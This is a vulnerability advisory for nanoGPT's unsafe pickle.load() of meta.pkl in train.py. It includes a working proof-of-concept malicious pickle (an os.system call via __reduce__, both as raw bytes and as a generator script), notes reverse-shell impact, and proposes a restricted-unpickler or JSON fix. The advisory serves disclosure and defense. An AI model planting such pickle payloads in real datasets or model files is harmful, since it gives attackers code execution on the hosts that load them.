Description
Summary
An Unsafe Deserialization via pickle.load() in nanoGPT allows Remote Command Execution on the server host.
Details
The vulnerability is caused by the use of the unsafe pickle.load() function of the pickle serialization library (train.py#L142).
import pickle
# ...
# attempt to derive vocab_size from the dataset
meta_path = os.path.join(data_dir, 'meta.pkl')
meta_vocab_size = None
if os.path.exists(meta_path):
    with open(meta_path, 'rb') as f:
        meta = pickle.load(f)
    meta_vocab_size = meta['vocab_size']
    print(f"found vocab_size = {meta_vocab_size} (inside {meta_path})")

PoC
For a simple proof of concept we're using the bytes representation of the pickled object below:

class Evil:
    def __reduce__(self):
        return (os.system, ("touch pwned",))

that is:

\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch pwned\x94\x85\x94R\x94..
Using this payload as the content of the file meta.pkl, an attacker can execute arbitrary system commands.
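For reference, a payload of this kind can be regenerated with a short script like the sketch below (the exact bytes depend on the platform and pickle protocol, e.g. os.system resolves to posix.system on Linux):

```python
import os
import pickle

class Evil:
    # __reduce__ tells pickle how to "reconstruct" the object on load;
    # here it instructs the unpickler to call os.system("touch pwned")
    def __reduce__(self):
        return (os.system, ("touch pwned",))

payload = pickle.dumps(Evil())

# Writing these bytes to meta.pkl means any later pickle.load()
# of that file runs the command on the loading host.
with open('meta.pkl', 'wb') as f:
    f.write(payload)
```

Note that the command runs at deserialization time; the victim never needs to use the resulting object.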
Impact
Usually, if attackers can control the dataset, they can subvert the model's behavior, for example by injecting fake outputs into cached queries.
In this case, attackers can run arbitrary system commands without any restriction (e.g. they could use a reverse shell and gain access to the server).
The impact is high as the attacker can completely take over the server host.
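A possible mitigation (a sketch, not part of nanoGPT; the SafeUnpickler and safe_load names are illustrative) is to override pickle.Unpickler.find_class so the unpickler refuses to resolve any global, which blocks payloads that import callables such as os.system while still allowing a meta.pkl made of plain primitives:

```python
import io
import pickle

class SafeUnpickler(pickle.Unpickler):
    # Refuse to resolve any global: payloads that try to import
    # callables (like os.system) raise instead of executing.
    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"global '{module}.{name}' is forbidden")

def safe_load(data: bytes):
    return SafeUnpickler(io.BytesIO(data)).load()

# A plain dict of primitives still loads fine:
meta = safe_load(pickle.dumps({"vocab_size": 65}))
print(meta["vocab_size"])  # 65
```

Since meta.pkl only needs to carry simple metadata like vocab_size, an even simpler fix is to store it as JSON instead of pickle.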
Credits
Edoardo Ottavianelli (@edoardottt)